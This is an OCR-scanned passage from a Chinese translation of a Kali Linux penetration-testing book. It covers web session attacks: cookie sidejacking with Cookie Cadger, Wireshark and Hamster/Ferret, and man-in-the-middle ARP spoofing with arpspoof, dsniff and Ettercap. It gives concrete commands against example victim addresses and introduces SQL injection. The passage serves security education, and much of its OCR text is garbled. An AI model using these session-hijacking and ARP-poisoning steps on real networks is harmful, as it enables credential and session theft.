Created by Matthew Sullivan - mattslifebytes.com 
This software is freely distributed under the terms of the FreeBSD license. 


要 启动 ， 选 择 相 应 的 界面 ， 点 击 Start Capture。 如 果 有 多 个 网 卡 ，Cookie Cadger 还 提供 了 多 
个 网 卡 抓 包 的 功能 。 
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Cookie Cadger 可 以 枚 举 可 用 网 络 中 发 现 的 所 有 设备 。 举 个 例子 , 下 面 截图 显示 的 是 一 人 台 使 用 
Firefox 和 Iceweasel 的 Linux 1686 主 机 。 


' Requests | Recognized Sessions 


| Filter MACs | | Fiter Domains | | Filter Requests 
00: 0c: 29:49: 84:73 [ All Domains ] = 


a.scorecardresearch.com, - 
MAC Address: 00:0c:29:49:84:73 
IPv4 Address: 172.16.76.131 
Detected User-Agents: 
- Mozilla/5.0 (X11; Linux i686; w:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1 


Cookie Cadger 检 测 到 的 最 新 事件 的 各 个 字段 会 以 蓝 色 文 本 显示 。 你 可 以 查看 主机 正在 浏览 
容 的 详情 ， 比 如 netbios 名 称 和 主机 名 。 你 可 以 将 请 求 复 制 到 剪贴 板 并 导出 信息 ， 如 用 户 信 息 和 
MAC 地 址 等 。 各 部 分 都 具备 过 滤 需 标签 ,用 来 缩小 特定 目标 的 范围 ( 举 个 例子 ， 只 查看 Facebook 
域名 )。 


只 要 Cookie Cadger 识 别 出 一 个 登录 会 话 ， 它 就 会 截获 会 话 ， 并 提供 了 加 载 会 话 的 功能 。 下 
个 截图 显示 的 是 截获 的 管理 员 登 录 到 wwwi.thesecurityblogger.com 的 会 话 。Cookie gn — 
个 图 标 ， 并 解释 截获 的 会 话 类 型 。 它 可 能 是 Hotmail 、Facebook， 或 是 本 例 中 所 示 的 ，Wordpress 
的 登录 。 


Cookie Cadger 
File Edit Help 


etho [no description] (CURRENTLY CAPTURING) Stop Capture on ethO 
L 


[ Requests | Recognized Sessions 


Wordpress installation on 


www.thesecurityblogger.com 
User. 


Automatically Load Sessions Into Browser (Demo Mode) Load Selected Session 


+ TU 
Capture device search completed with 4 devices found. 


Cookie Cadger (v1.00, https://cookiecadger. com) 
Created by Matthew Sullivan - mattslifebytes.com 
This software is freely distributed under the terms of the FreeBSD license. 


Opening 'ethO0' for traffic capture. 
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要 查看 已 经 识别 的 会 话 ， 点 击 名 为 Recognized Sessions 的 标签 ， 从 窗口 中 选择 一 个 会 话 ， 如 
前 面 的 截图 中 所 示 。, 一 旦 高 党 显示 , 就 点 击 Load Selected Session 按 钮 来 重 放 会 话 。Cookie Cadger 
会 在 底部 窗口 中 显示 加 载 过 程 , 它 还 会 打开 一 个 浏览 各 并 以 截获 的 会 话 中 的 用 户 喘 份 登录 。 下 面 
的 鹤 图 显示 的 是 打开 截获 的 受害 者 的 一 个 域 cookie。 完 成 加 载 后 ， 它 会 用 默认 的 Web 浏 览 各 以 跟 
委 取 的 cookie 关 联 的 权限 打开 截获 的 页 面 


www.myspace.com 6:16:54 AH: /wp-content/plugins/stats/_inc/jetpack.css?ver=2011082 
www.thesecurityblogger.ca 6:16:54 AH: /wp-content /plugins/1-flash-gallery/js/swfhelper.js?ve 
www.yahoo.com 6:16:54 AH: /wp-content /plugins/1-flash-gallery/js/gallery/photoGa 
6:16:54 AH: /wp-content /plugins/daily-stat/js/luc.ajax.geoip.js?ve 
6:16:54 AH: /wp-content /plugins/daily-stat/js/luc.ajax.tables.js?v + 
4| | |^ 


Load Domain Cookies Replay Request | Modify & Replay Request 


Loading request inte lease wait... 


要 查看 会 话 的 请 求 信 息 ， 右 击 已 抓 取 的 会 话 图 标 ， 选 择 View Associated Request。 它 会 将 你 
市 回 Requests 标 签 ， 并 显示 该 会 话 。 


5.3.8 Wireshark 


Wireshark 是 最 流行 的 免费 开源 网 络 协 以 分 析 工 具 之 一 。Wireshark 已 在 Kali 中 预 装 , 是 理想 的 
网 络 问 题 排查 和 分 析 工 具 。 在 本 章 中 ， 它 是 用 作 监 测 发 日 潜在 目标 来 截获 会 话 令 脾 的 最 住 工具 。 
Wireshark 使 用 GTK+ 组 件 工具 ! 集 来 实现 它 的 用 户 界 面 ， 用 pcap 来 进行 包 抓 取 。 它 跟 tcpdump 命 令 
的 工作 原理 非常 类 似 ， 不 过 它 的 作用 是 市 有 集成 的 排序 和 过 滤 功 能 的 图 形 化 前 并 。 


Wireshark 可 以 在 Sniffing/Spoofing > Network Sniffers > Wireshark 中 找到 ， 或 是 在 Top 10 
Security Tools 分 类 中 找到 。 
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The Wireshark Network Analyzer [Wireshark 1.8.5 ] 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
E d Oo a BG 
Filter: | | > | Expression... Clear Apply Ve 


The World's Most Popular Network Protocol Analyzer 
Version 1.8.5 


Capture Files 


Interface List = Open Website 


Live list of the capture interfaces Opena previously captured file Visit the project's website 
(counts incoming packets) 


Open Recent: zs User's Guide 
Start $ 


Choose one or more interfaces to capture from, then Start Ø Sample Captures 


EP) ethO 
Ef] Linux netfilter Log (NFLOG) interface: nflog 


|  TheUser's Guide (onLine version) 


A richassortment of example capture files onthe wiki Security 


Work with Wireshark as securely a 


Ef Pseudo-device that captures on all interfaces: an|v 


ui | E 
Capture Options 


Start a capture with detailed options 


要 开始 抓 取 网 络 上 的 包 ,， 选择 Capture 标 签 和 Interfaces。 你 能 够 看 到 用 以 抓 包 的 网 卡 。 在 这 
个 例子 中 ， 我 要 点 击 eth0 劳 边 的 勾 选 框 并 选择 Start 来 选择 eth0 进 行 抓 包 。 


如 果 你 抓 包 用 的 网 卡 不 支持 混杂 模式 或 是 你 的 操作 系统 无 法 启用 该 网 卡 的 
混杂 模式 , 那么 你 可 能 无 法 看 到 任何 包 。 有 关 不 同 抓 包 模 式 和 问题 排查 的 更 多 信 
息 可 以 在 www.wireshark.org 上 找到 。 


Wireshark: Capture Interfaces 


Device Description IP Packets Packets/s 
| ethO 172.16.76.131 5 
nflog Linux netfilter Log (NFLOG) interface 


any Pseudo-device that captures on all interfaces none 
127.0.0.1 


| Stop | | Options | | Close " 


Wireshark 会 截获 线 上 的 所 有 网 络 数据 。 网 络 数据 可 以 通过 在 过 滤 字 段 输入 特定 内 容 或 是 在 
上 部 的 表 ( 如 协议 或 目的 地 ) 中 调整 数据 的 组 织 形 式 来 进行 过 滤 。 


5.3 Web 会 话 工 具 155 


Capturing from ethO [Wireshark 1.8.5 ] 


File Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 


ei ai &Qà ^ * X BIG) 5* 5: ad 5 m 


Filter: | Expression... 


| ^| 


No. i Source Destination Protocol Length Info 
280 .00182200€ 31. 13. 77.90 172. 16:76. 131 TCP 60 https > 50958 [ACK] Seq=149 Ack=214 Wii 
281 . 08895200¢ 31. 13. 77. 90 Uy E15 16:76 131 TLSv1 91 Application Data 
282 175.0889; 31.13.77.90 TCP 54 50958 Seq=214 Win=0 Len= 
283 E IURE SPIRI TLSv1 
284 175 r2. 31.13.77.90 TCP Seq=214 Win=0 Len= 
285 . 113034006 69.171.235.16 lire ial sig Fig di Al TLSv1 464 Application Data 
286 .11305900€ 172.16.76.131 59:171 235.16 TCP 54 38133 > https [ACK] Seq=8113 Ack=3651 ! 
287 5 1197220 172. 16. 76. 131 69.171.235.16 TLSv1 1166 Application Data 
288 .11991600€ 69.171.235.16 Wy ete UB ZB AE TCP 60 https > 38133 [ACK] Seq=3651 Ack=9225 | 
289 S [saranno o galee dal Tora Ea 69.171.242.27 TLSv1 91 Application Data 
290 . 368100006 69.171.242.27 172.16.76.131 TCP 60 https > 51024 [ACK] Seq=2305 Ack=9693 | 
291 . 380104006 69.171.242.27 Ir et UB EAT TLSv1 91 Application Data = 
292 . 380123006 172.16.76.131 69.171.242.27 TCP 54 51024 > https [ACK] Seq=9693 Ack=2342 iv 

| ul | [») 

b Frame 1: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface O 

b Ethernet II, Src: Vmware 49:84:73 (00:0c:29:49:84:73), Dst: Vmware ea:85:48 (00:50:56:ea:85: 48) 

> Internet Protocol Version 4, Src: 172.16.76.131 (172.16.76.131), Dst: 199.7.48.72 (199.7.48.72) 

P Transmission Control Protocol, Src Port: 34058 (34058), Dst Port: http (80), Seq: 1, Ack: 1, Len: O 


00 50 56 ea 85 48 00 Oc 29 49 84 73 08 00 45 00 PW. .RH II.Bi.E. 
OO 28 4a 88 40 OO 40 O6 00 65 ac 10 4c 83 c7 07 .(J.@.@. .8..L... 
30 48 85 Oa OO 50 Of le bl c6 d9 74 83 la 50 11 OH...P.. ...t..P. 
39 08 e4 19 OO OO 


Wireshark 抓 取 了 大 量 的 细 市 信息 ， 所 以 过 滤 出 特定 内 容 很 重要 ， 比 如 不 安全 的 cookie( 如 
http.cookie ) 的 参数 。 举 个 例子 ，Gmail 默 认 是 加 密 的 ， 不过， 你 可 以 关闭 https 并 找 出 http.cookie 
中 包含 的 GX 参数 来 识别 不 安全 的 Gmail cookie。 下 面 的 截图 显示 的 是 从 登录 Wordpress blog 过 程 中 
fX HY cookie: 


Filter: |http.cookie | v | Expression... Clear Save 


No. Time Source Destination Protocol Length Info 


2133 66. 509258000 31 30 HTTP 844 GET /wp-login.php?redirect_to=http%3A% 
2143 67.146028000 31 30 HTTP 1048 GET /wp-admin/css/wp-admin.min.css?ver: 
2164 67.228848000 31 30 HTTP 1049 GET /wp-includes/css/buttons.min.css?v 
2175 67.263938000 31 30 HTTP 1051 GET /wp-admin/css/colors-fresh.min.css 
2179 67.271618000 31 30 HTTP 1037 GET /wp-includes/js/swfobject.js?ver-2 
2185 67.282487000 31 30 HTTP 1035 GET /wp-includes/js/jquery/jquery.js?wv 
2189 67.282939000 31 30 HTTP 1052 GET /wp-content/plugins/1-flash-galler 


2191 67.283378000 31 30 HTTP 1064 GET /wp-content/plugins/1-flash-galler: 
2209 67.352113000 31 30 HTTP 1048 GET /wp-content/plugins/gd-star-rating 
2215 67.359782000 31 30 HTTP 1057 GET /wp-includes/js/thickbox/thickbox.: 
2217 67.360138000 31 30 HTTP 1058 GET /wp- content/gd-star-rating/css/rat: 
2222 67.365901000 31 30 HTTP 1045 GET /wp-includes/js/thickbox/thickbox. 


| - ul |] 


> Frame 2127: 766 bytes on wire (6128 bits), 766 bytes captured (6128 bits) on interface O 

> Ethernet II, Src: Vmware 49:84:73 (C^ 7. 79? 575.54 73), Dst: Vmware ea:85:48 (C^ -^ -^ aF 48) 

b Internet Protocol Version 4, Src: N24. mede un. es S429 209p ed 00-2990) 

> Transmission Control Protocol, Src Port: 57737 (57737), Dst Port: http (80), Seq: 1, Ack: 1, Len: 712 
b Hypertext Transfer Protocol 


SENA AE ZR HJcookie/c: , Tj ALS HR, TASH EIEA BIR DUI |. EASTER 
动 持 。 选 取 受 害 者 的 cookie， 右 击 该 行 ， 选 择 Copy > Bytes > Printable Text Only。 现 在 ， 你 可 以 
将 其 精 贴 到 cookie 注 入 工具 中 ， 比 如 Firefox 的 插件 Cookie Injector。 查 看 Firefox 择 件 下 的 Cookie 
Injector 来 完成 会 话 支持 攻击 。 
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| GS 你 必须 同时 安装 GreaseMonkey 和 Cookie Injector 来 复制 /粘贴 到 Firefox 浏 览 器 。 


有 许多 有 用 的 工具 文 持 Wireshark 的 抓 包 数据 和 人 简化 找到 的 数据 。 举 个 例 于 ，NetWitness 
Investigator 可 以 从 www.emc.com 人 免费 下 载 。 


5.3.9 Hamster 和 Ferret 


Hamster 是 一 款 用 于 通过 HTTP 会 话 劫持 窃取 cookie 的 工具 ， 它 使 用 的 是 被 动 嗅 探 ， 也 称 为 劳 
路 劫持 (sidejacking )。Hamster 会 历 听 网 络 上 的 数据 ,， 抓 取 所 有 可 见 的 会 话 cookie， 然 后 将 禄 取 的 
cookie 导 入 到 浏览 需 的 GUI 环境 中 ， 这 样 攻击 者 就 能 回放 该 会 话 。Hamster 使 用 Ferret 来 抓 取 会 话 


cookie. 


Hamster 可 以 通过 浏览 Sniffing/Spoofing > Web Sniffers， 选 取 Hamster 来 局 动 。 


在 局 动 Hamster 针 ， 它 会 打开 一 个 终端 窗口 来 局 动 Hamster 服 务 。 默 认 的 代理 IP 是 127.0.0.1:1234。 


Terminal 


File Edt View ‘Search Terminal Help 
- HAMPSTER 2.80 side-jacking tool --- 


to use proxy http://127.68.8. 
opt apis 
n listening port(1234) 
zin PN taning on 127.8.0.] 1234 
begining thread 


f n] DAR FT Pa ee HO YS [od htp://127.0.0.1:1234 £77 la] Hamster. 


Hamster 7) Mozilla Firefox Start Page 


om @ 127.0.0.1:1234 


fai Most Visited J| Offensive Security Kali Linux KaliDocs ,t.ERBIDIIMSE 
@ Disable Cookies CSS (&# Forms ae ® Informe 
-- no HAMSTER 2.0 Side-Jacking 

[ adapters | help ] 


clone 
STEPS:In order to sidejack web sessions, follow these steps. FIRST, click on the adapter menu and 
targe start sniffing. SECOND, wait a few seconds and make sure packets are being received. THIRD, wait 
until targets appear. FOURTH, click on that target to "clone" it's session. FIFTH, purge the cookies 
mm from your browser just to make sure none of them conflict with the cloned targets. again 
TIPS: remember to refresh this page occasoinally to see updates, and make sure to purge all cookies 
No target from the browser l 
has been WHEN SWITCHING target, rember to close all windows in your browser and purge all cookies first 


selected Status 

yet Proxy unknown 
Adapters: none 
Packets: 0 
Database: 0 
Targets: O 
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网 络 数 据 要 完成 它 的 功能 必须 流 经 Hamster。 你 可 以 选择 点 击 适 配 融 链接 来 选择 要 使 用 的 网 
卡 。 举 个 例子 ， 这 里 我 要 监测 的 是 eth0。 


series d EFES | iip ie name and iro boi na UE rpg tton. Thie ada apanr must support 
pi omiseue de monita g. You may have to first confi the Kamoora Hol ommarndad line 


acjalr Tor wW ifl adapte erg 


SUTE GRH 


Hamster 会 将 你 重 定 问 到 一 个 动 持 活动 页 面 。 你 会 注意 到 你 并 没有 收 到 任何 数据 包 。Hamster 
ra^ iip an 络 数据 。 你 可 以 通过 浏览 Sniffing/Spoofing > Web Sniffers 并 选择 Ferret 
来 使 用 Ferret。 它 会 打开 一 个 终端 窗口 ， 并 显示 一 些 选 项 。 输 入 “ferret -i 网 卡 名 ”来 选择 要 
ele 网 卡 。Ferret 会 告诉 你 它 正 在 嗅 探 ， 该 命令 行 提示 符 会 基 停 在 运行 状态 。 在 你 
查看 网 络 数据 的 同时 ， 在 Ferret 中 抓 取 的 网 络 数据 包 会 显示 为 文本 。 


Ferret 运 行 起 来 后 ,浏览 回 Hamster， 你 应 该 开始 查看 数据 包 了 。 网 络 上 的 所 有 日 标 痢 会 显示 5 
出 来 。 点 击 你 要 查看 的 日 标 来 查看 截获 的 cookie。 


和 :———- NECI m - 
Hamster X Dashboard « The Security BL... ^ "The Secufity Blogger 


EN è 127.0.0.1:1234 


| fai Most Visited [| Offensive Security Kali Linux Kali Docs D. ejie-t)e 


P Disable Cookies CSS Pi Forms — E ^ Informat Oya = Miscellaneous F eustins /@REsize 7 Serm E 
| : sapien : 
172.16.76.131 


STEPS:In order to sidejack web sessions, follow these steps. 
FIRST, click on the adapter menu and start sniffing. SECOND, 
wait a few seconds and make sure packets are being received. 
THIRD, wait until targets appear. FOURTH, click on that target 
to "clone" it's session. FIFTH, purge the cookies from your 
browser just to make sure none of them conflict with the cloned 
targets. again 
TIPS: remember to refresh this page occasoinally to see 
updates, and make sure to purge all cookies from the browser 
WHEN SWITCHING target, rember to close all windows in your 
browser and purge all cookies first 

Status 

Proxy: unknown 
Adapters: none 


no TEN de 

nahi Jn. Packets: O 

b13013 Database: 315 
Targets: 1 


e 172.16.76.131 
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点 击 任意 cookie 来 访问 截获 的 cookie。 在 这 个 例子 中 , 我 回放 的 是 访问 wwwthesecuritybloggercom。 


———— UII ANH - 
Hamster x Dashboard « The Security Bl... ^* The Securify Blogger 


EE @ 127.0.0.1:1234 e Mj» Google E dn o 


ii Most Visited J| Offensive Security Kali Linux KaliDocs , E POEB 
T : : | 
@ Disable Cookies 1 on ^ ~ oc rM 


security Blogger | @ | + New | Edt Page pm si 


The Security 
Blogger 


ABOUT THE SECURITY BLOGGER 


| 


NA A 
/ vh. A 


Ab O ut The s your 
email 


| Search Security address: 
mmm Blogger 


5.3.10 中间人 攻击 (MITM) 


rg] AS Ae 3:31 81 Ur HJ — RUE XX s ee 者 建立 一 个 连接 , 并 在 受害 者 之 间 
中 转 消 息 , 使 他 们 以 为 他 们 正在 直接 跟 对 方 对 话 。 这 类 攻击 有 许多 形式 ， 比 如 使 用 Haks 的 菠 葛 型 
无 线路 由 器 并 将 其 伪装 成 可 信 的 无 线 网 络 接 入 点 ， we 和 无 线 网 络 之 间 的 中 
间 人 。 另 一 个 例子 是 使 用 Kali 来 在 受害 者 和 默认 路 由 器 之 间 转 发 网 络 数据 ， 而 同时 嘿 探 春 有 用 信 
息 ， 比 如 登录 凭据 。 


， 这 能 
—— — XL ea MAE ene ae 
EE 


许多 云 服 务 比 如 Facebook 和 Gmail 都 通过 HTTPS 来 实施 安全 登录 
的 话 。 


5.3.11 dsniff 和 arpspoof 


dsniff 是 一 组 密码 咒 探 和 网 络 数据 分 析 工 具 ， 用 于 解析 不 同 的 应 用 协议 和 提取 相关 信息 。 
arpspoof 用 于 帮助 攻击 者 加 本 地 网 络 发 送 伪造 的 地 址 解析 协议 ( ARP, Address Resolution Protocol ) 
消息 。 这 么 做 的 目的 是 要 将 攻击 者 的 MAC 地 址 和 其 他 主机 的 IP 地 址 关联 起 来 ， 从 而 将 发 往 该 IP 
地 址 的 网 络 数据 都 发 送 给 攻击 者 。 
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一 个 人 工 进 行 中 间 人 攻击 的 方法 是 将 arpspoof 和 dsniff 用 在 系统 间 。 和 第 一 步 是 用 第 2 章 中 介绍 
的 技术 找 出 受害 者 的 IP 地 址 和 网 络 的 默认 网 关 。 找 出 PP 地址 后 ,你 需要 告诉 受害 者 你 真 的 是 男 
个 系统 或 是 默认 网 关 。 举 个 例子 ， 如 果 受 害 者 一 的 IP 是 172.16.76.128， 默 认 网 关 是 172.16.76.2， 
攻击 者 是 172.16.76.131， 你 应 该 用 arpspoof 命 令 将 你 那个 为 131 的 IP 地 址 设置 得 看 起 来 像 是 受害 者 
的 和 默认 网 关 的 。 


打开 两 个 终端 窗口 ， 在 每 个 窗口 中 输入 如 下 命令 来 欺骗 受害 者 : 


终 站 一 : 


arpspoof -t 172.16.76.128 172.16.76.2 // 告诉 受害 者 2 你 就 是 默认 网 关 
arpspoof -t 172.16.76.2 172.16.76.128 // 告诉 受害 者 1 你 就 是 默认 网 关中 


root@kali: ~ 


File Edit View Search Terminal Help 
:~# arpspoof -t 172.16.76.128 172.16.76.2 
:49:84:73 0:c:29:50:4f:25 0806 42: arp reply | 


© 


A A NA YA Wn wn 


:49:84:73 0:c:29:50:4f: 0806 42: arp reply 
: 73 0:c:29:50:4f: 0806 42: arp reply : 


:c:29:50:4f: 0806 42: arp reply 


N 


3 0:c:29:50:4f: 0806 42: arp reply : 


4 
0: 
4: 
Q: 
4: 
0: 
4: 
0: 
4: 
0: 


MNJ 
4D 


:C:29:50:4f:25 0806 42: arp reply 


File Edit View Search Terminal Help 


:~# arpspoof -t 172.16.76.2 172.16.76.128 
:84:73 0:50:56:ea:85:48 0806 42: arp reply 


:84:73 0:50:56:ea:85:48 0806 42: arp reply | 
:84:73 0:50:56:ea:85:48 0806 42: arp reply 
:84:73 0:50:56:ea:85:48 0806 42: arp reply 


:84:73 0:50:56:ea:85:48 0806 42: arp reply 


如 果 正 确 输 入 了 命令 , 你 应 该 能 看 到 网 络 数据 正在 通过 攻击 系统 回放 。 这些 网 络 数据 不 是 直 
接 跟 受害 者 交互 ， 所 以 这 时 受害 者 不 会 发 现 数 据 流 出 了 网 络 。 要 完成 攻击 ,你 需要 局 用 IP 转 发 功 
BE. 这样 网 络 数据 会 继续 从 点 认 网 天 流 癌 受害 者 , 反之 亦 然 ; 虽然 攻击 者 已 经 在 观察 受害 者 和 于 
认 网 关 之 间 的 网 络 数据 了 。 


CD 此 处 的 代码 原 注 释 有 问题 。 它 将 两 条 命令 都 解释 为 将 本 机 扮演 成 默认 网 关 的 角色 。 实 际 上 它 是 一 边 扮演 默认 网 关 
的 形象 ， 一 边 扮演 另 一 台 主 机 的 形象 。 一 一 译 者 注 
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E 
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打开 第 三 个 终端 


"Qu, 


身份 认证 攻击 


输入 : 


echo 1> /proc/sys/net/ipv4/ip forward 


'=# echo 1 > /proc/ 


m a Qe 
sys 


s/net/ipv4/ip forward 


此 刻 , 网 络 数据 应 该 已 经 


的 截图 显示 的 是 在 没有 启用 卫 转 发 时 ping 回 显 失败 的 情况 。 
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5232 TE ‘ins 


—LLL.L.L.IR 


mj j| mi L.L.L.I 


EEMETA AB EB HEREA AA SZ R Y. 下面 


下 一 步 , 局 动 dsniff 来 观察 网 络 数据 。 dsniffn] 以 通过 浏览 Sniffing/Spoofing > Network Sniffers 


并 选择 dsniff 找 到 。 


它 会 打开 一 个 终端 窗口 ， 显 示 dsniff 的 用 法 ， 如 下 面 的 截图 所 示 : 


要 启动 dsniff, 输入 qsniff 命 令 并 用 -i 后 跟 网 卡 来 选 


如 下 图 所 示 的 asniff 来 咒 探 eth0 上 的 所 有 网 络 数据 : 


dsniff 会 截获 所 有 的 登录 信息 。 举 个 例子 ,如 果 受 


， 你 就 能 看 到 登录 的 尝 


5/25/13 


USER adm 


PASS pas 


:~# dsniff 


Listen 


ing on 


DASHA, jdsniffii 24 256 


7-15-18 
iri 
gwordiz23 


RENTAL R ANAF, 我 输入 了 


TP 登录 到 系统 上 的 , 该 会 话 一 


n 


Zh. 
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5.3.12 Ettercap 


Ettercap 是 一 个 用 于 基于 中 间 人 方式 的 攻击 的 免费 的 开源 综合 工具 套件 。 


Ettercap 可 用 于 计算 机 网 络 协议 分 析 和 安全 审计 ， 它 的 功能 有 了 唱 探 活动 的 连接 、 内 容 过 滤 ， 
以 及 对 多 种 协议 的 主动 和 被 动 解析 的 支持 。Ettercap 通 过 将 攻击 者 的 网 卡 置 人 混杂 模式 以 及 对 受 
害 者 的 机 需 进 行 ARP 污 染 来 工作 。 


要 启动 Ettercap， 浏 览 到 Sniffing/Spoofing > Network Sniffers， 并 选择 Ettercap 图 形 。 


ettercap NG-@. f 4 


| Dene Hag 


第 一 步 是 选择 打算 用 于 嗅 探 的 网 卡 。 切 换 到 Sniff 标 签 ， 选 择 嗅 探 类 型 ( Unified sniffingzk 
Bridged sniffing ) FRITA H FIRIR R-E 


ettercap Nt 


File z Options Help 
| 


Bridged sniffing... Shift+B 


Set pcap filter... P 


ettercap Input 


a ee = 
-- Network interface : 


Cancel 


现在 ，Ettercap 会 显示 更 多 有 末 单 选项 ， 如 下 面 的 截图 所 示 : 
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ettercap NG-0.7.4.2 


Start Targets Hosts View Mitm Filters Logging Plugins Help 


28 plugins 

41 protocol dissectors 

56 ports monitored 
7587 mac vendor fingerprint 
1766 tcp OS fingerprint 
2183 known services 


我 们 先 来 对 网 络 扫描 一 下 可 用 的 主机 。 切 换 到 Hosts 界 面 ， 选 择 Scan for hosts, Ettercap t 
速 扫描 整个 C 类 了 网络， 并 列 出 所 有 找 出 的 主机 。 通 常 ， 路 由 需 是 第 一 个 找到 的 主机 。 下 面 的 截图 
显示 的 是 在 某 次 扫描 中 发 现 的 四 台 设 备 。 


Hast List MN 


IP Address MAC Address Description 
172.156.761 Og 50 
17216.762 00:50 
lZ2Z15.,/512B QUUL 


172.16.76.254 00:50 


Pelete Host Aude to Target l Add to larget 起 


在 本 例 中 , 我 们 找到 了 四 台 设 备 。 我 们 假设 .1 那个 了 正 对 应 的 是 路 由 顺 ， 而 且 我 们 要 针对 的 受 
害 者 机 融 的 卫 是 .128。 我 们 将 路 由 需 选 作 目 标 1， 受 害 者 .128 选 作 目 标 2。 这 会 将 我 们 的 系统 放 
在 受害 者 和 路 由 天 的 中 间 , 整个 都 是 经 典 的 中 间 人 攻击 形式 。 选 择 每 个 目标 , 点 击 对 应 的 勾 选 框 ， 
你 可 以 切换 到 Targets 页 面 并 选择 Current Targets 来 验证 目标 。 


Delete Host | Add to Target 1 


3 hosts added to the hosts list... 
Randomizing 255 hosts for scanning... 


Scanning the whole netmask for 255 hosts... 
4 hosts added to the hosts list... 

Host 172,16.76.1 added to TARGET1 

Host 172.16.76.128 added to TARGET 2 


下 一 步 ， 让 我 们 来 看 一 下 在 Mitm 下 面 的 中 间 人 选项 。 这 里 还 有 Arp poisoning... ICMP 
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redirect... Port stealing... 4IDhcp spoofing... 等 选项 。 举 个 例子 , 我 们 选择 了 Arp poisoning... 选 项 ， 
HH T Sniff remote connections 24 . 


| Filters Logging 


Arp poisoning. 
Icmp redirect... 
Port stealing.. 
Dhcp spoofing 


Stop mitm attack(s) 


MITH Attack: ARP Folsoning (as nobody) 


i " ^ Optional parameters 
| EM ud | 
mm M Sniff remote connections. 


Only poison one-way. 


OK Cancel 


现在 ,我 们 可 以 抓 取 路 由 融和 受害 者 机 带 之 间 的 网 络 数据 了 。 TVR ERA, ECO 
名 和 密码 信息 等 ， 可 以 被 截 获 并 显示 在 执行 窗口 汇 中 。 


5.3.13  Driftnet 


DriftnetZé —3)H 3 A i zi A Be P TUBUART Fr RJ BLA TO. Driftnetzzz& 4E— 9) LEZ 
前 先 建立 一 个 中 间 人 攻击 。 你 可 以 在 启动 Driftnet 之 前 ， 利 用 前 面 介 绍 的 arpspoof 和 dsniff 或 是 
Ettercap 方 法 来 启动 中 间 人 攻击 。Driftnet 可 以 同时 并 行 运行 多 个 ， 以 便 快 速 呈 现 线 上 数据 中 的 所 
有 A F O 


Driftnet J LI fESniffing/Spoofing > Web Sniffers 中 选择 Driftnet。Driftnet 会 以 终端 形式 打开 并 
显示 如 何 使 用 该 工具 的 帮助 信息 。 你 需要 指定 你 想 用 哪个 网 卡 来 嗅 探 数据 以 及 你 想 将 截获 的 网 片 
用 作 什么 用 途 。 举 个 例子 , 你 可 以 选择 用 -b 选 项 来 为 每 个 图 请 发 出 一 声 哗 轮 的 声音 ,或 是 将 图 搬 
显示 在 终端 屏幕 上 ， 或 是 将 鹤 获 的 图 片 发 送 到 某 个 目录 。 下 面 提供 的 规 图 显示 的 是 从 eth0 抓 取 
图 片 ， 并 将 图 片 放 到 位 于 上 ooVDesktop/CapturedImasges 目 录 中 。 


ES 


下 面 的 例子 假设 我 们 已 经 用 eth0 作 为 监听 端口 建立 了 一 个 中 间 人 攻击 环境 。 


:~# driftnet -i ethO -d /root/Desktop/@apturedImages/ 


164 第 5 章 ”身份 认证 攻击 


Driftnet 启 动 后 ， 它 会 打开 一 个 新 的 空白 终 并 窗口。 如 果 你 让 Driftmet 显 示 图 片 ， 图 片 就 会 显 
示 在 这 个 窗口 。 如 果 你 选择 不 要 显示 图 片 ,， 比如 用 了 选项 -a, 那么 图 片 就 不 会 出 现在 这 里 , 不 过 ， 
图 片 会 发 送 到 命令 中 指定 的 目录 。 下 面 的 截图 显示 的 是 从 正在 浏览 www.drchaos.com 的 受害 者 那 
里 抓 取 图 片 。 


5.4 SQL 注 入 


数据 库存 储 着 数据 ， 并 将 数据 以 某 种 逻辑 顺序 进行 组 织 。Oracle 和 Microsoft SQL 是 流行 的 数 
据 库 管理 系统 的 例子 , 它们 允许 用 户 创建 多 种 类 型 的 数据 库 来 用 于 存储 , 并 以 全 新 的 方式 来 组 织 
数据 Q 


结构 化 查询 语言 ,也 就 是 我 们 熟知 的 SQL， ERE, PY AERE REEE E PE 
系统 理解 。 它 使 用 一 组 数据 库 可 以 理解 的 公共 命令 , 为 应 用 访问 数据 库 中 的 数据 提供 了 一 个 通用 


途 行 。 


攻击 者 可 以 对 这 些 数据 库 进行 利用 , 使 其 显示 本 不 该 显示 的 输出 信息 。 有 时 这 种 攻击 会 非常 
简单 ， 就 是 攻击 者 直接 向 数据 库 管 理 系统 查询 一 些 特权 信息 。 有 时 ,攻击 者 利用 的 是 数据 库 管理 
员 的 不 当 配置 。 攻击 者 也 可 能 会 利用 数据 库 管 理 系 统 的 漏洞 , 他 们 通过 这 些 沁 洞 可 以 查看 或 写 入 
数据 库 中 的 特权 命令 。 

攻击 者 经 各 会 通过 表单 或 Web 页 面 中 允许 用 户 输入 的 其 他 部 分 来 发 送 恶意 代码 。 举 个 例子 ， 
攻击 者 可 能 会 输入 随机 字符 ， 以 及 长 声明 ， 这 样 就 能 发 现 输入 变量 和 参数 设计 中 的 薄弱 的 地 方 。 
如 琳 菏 个 输入 字段 被 设 为 只 接受 不 超过 15 个 字符 的 用 户 名 ,那么 错误 提示 就 会 显示 数据 库 是 如 何 
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被 配置 的 细节 s 


Firefox 插 件 HackBar 支 持 测 试 SQL 查 询 ， 并 将 你 的 查询 注入 ， 改 变 SQL 请 求 。HackBar 插 件 也 
人 允许 渗透 测试 人 员 检 查 HTTP 提 交 的 信息 。 


Edt Wew History Bode Took Help 


Se "M "c : hy 3 ia http: /images.gocgle.nlfimages?dlienkefinefox- abris org mazilaen-US:cfficiallichanr. | | Be | Isle co ge 
@ Getting Started EY Latest Headlines 


= INT-] 4 INT+1 = HEX- @ HEX -1 MySQL  MBSOL X55 


http: / images. google. nl /images 
selienr-firefox-a 
&rlszarg.moózilla:en-Us:afficis&l 


Srotis 
Convert current selection Ep its SHA«256 hash 
[ Enable Postdata [ Enable Referrer 


Hetlntemet Afbeeldingen Maps Nieuws Video Gmail meer * Aanmelden 
Del nemel J Miaps MOUWS — vien tomas meer "anmelden 


( ;oogle lache nS Afpealdingen zaeken | Hat web doorzoeken | Ra NS cI 


Afbeeldingen Weergaven [Alle afheeldingstormaten "| Resultaten 1 - 20 van circa 1.160 voor hackbar (0,30 seconden) 


HackBar 1,6 


Preview Image of HackBatr Publisher's descnption of HackBar HackBar (1) 
200 x 150 - 30 kB 160 x 120 - 3 kB - jpag B12 x 458 - 26 kB - jpeg 


